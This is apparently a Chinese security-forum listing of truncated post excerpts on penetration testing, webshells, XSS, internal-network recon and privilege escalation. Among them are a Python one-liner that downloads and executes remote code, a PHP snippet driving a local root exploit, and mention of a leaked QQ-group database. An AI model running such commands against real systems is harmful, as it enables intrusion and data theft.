渗透测试
关于mstsc共享盘符问题
很多时候 需要rdp传输文件,于是都需要共享一个磁盘用于远程计算机,但是共享后,又担心远程计算机感染病毒,或者某人切换到自己的session下对共享目录写文件,感染本地计算机,于是都是事先划分一个很小的磁盘出来 ,比如2g大小,用的时候再拷贝,可是windows下还有这么个命令,很有意思的,比如只有
【转自TSRC】浅谈开源web程序后台的安全性
一、前言 不知怎的最近甚是思念校园生活,思念食堂的炒饭。那时会去各种安全bbs上刷刷帖子,喜欢看别人写的一些关于安全技巧或经验的总结;那时BBS上很多文章标题都是:成功渗透XXX,成功拿下XXX。这里便以一篇入侵菲律宾某大学的文章引出文章的主题,我们先简要看一下过程。大学网站使用了名为j
webshell的另一用途
话说过个新年,人也懒了,好久没发帖了,上来看看号是不是被封了。。。。言归正传,不知道大家都用不用www.yascanner.com,旧版是www.bugscan.net。挂载各种插件,不过扫描要添加在线引擎节点。你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyy
“猥琐”成功XSS某网站
没什么技术含量,纯属来求金币的因为需求,对一个网站进行检测各种扫描无果于是开始进行各种xss注册会员开始问答处~~~~~~~不会饶,还请大牛赐教!!不会饶,还请大牛赐教!!最后各种翻,各种翻啊~~!!然后就看到了哈哈哈,很多获取IP的方式都能弄,包括ip38那就是我们的大杀器然后退出,再登录一遍—
mssql大数据高效率导入mysql
之前在网络上 看到 qqqun数据库 就将其下载下来玩玩大数据(纯属研究)下载下来发现是mssql 的,个人不怎么喜欢mssql 数据库同样的负载压力,MySQL要消耗更少的CPU和内存,MS SQL的确是很耗资源mysql 运行不需要启动那么多的服务 体积更小 mssql 体积很大mysql 可以跨平台 可以绿色启动 无需安装于是乎
渗透进内网后的一些信息收集脚本
前段时间路过了一个小站,发现内部结果及其复杂。所以自己写了个小脚本来帮助信息收集。由于跳板主机是linux,所以使用python和shell脚本异常方便了。首先ping存活主机,并将主机结果导入文件中,然后使用端口扫描脚本读取该文件,并进行端口扫描。1、扫描存活主机脚本使用方法 ./xxx.sh 192.168.10 >
网站渗透中个人修炼的部分内功心法
本篇幅无图,纯文字性描述,讲讲个人的一些经验,想到什么写什么,内容总结的不全面,不作为技术交流内容,下次再有想法继续写一篇,欢迎吐槽。内功心法1:诱惑性试探或者刺激目标站。对于网站(以下简称·站·),我们可以把他假想成一个人(以下简称‘人’),我们可以从他的外观看出这个人的品位,可
常见漏洞分析与安全编码
常见脚本漏洞分析与安全编码。一起学习。Build_Security_Codes.swf
PHP 非交互式 执行交互式命令
提权转发不出来只能出此下策shell可以用except来执行交互命令python 也有pexcept模块perl也有except模块但是默认不安装咱们还是用牛逼的php吧我就不解释了 看懂的人自然就懂了代码<?php$sucommand = "/tmp/2.6.18-2011";$fp = popen($sucommand ,"w");@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111
组策略限制webshell执行溢出
在11年就经常遇到在aspxshell下执行命令,无论啥目录都是提示个“由于一个软件限制策略的阻止,Windows 无法打开此程序。要获取更多信息,请打开事件查看器或与系统管理员联系。”当时还在土司发了个贴求过程,传送门https://www.t00ls.com/thread-18755-1-1.html最近因一基友安全需要,一国外站点目录
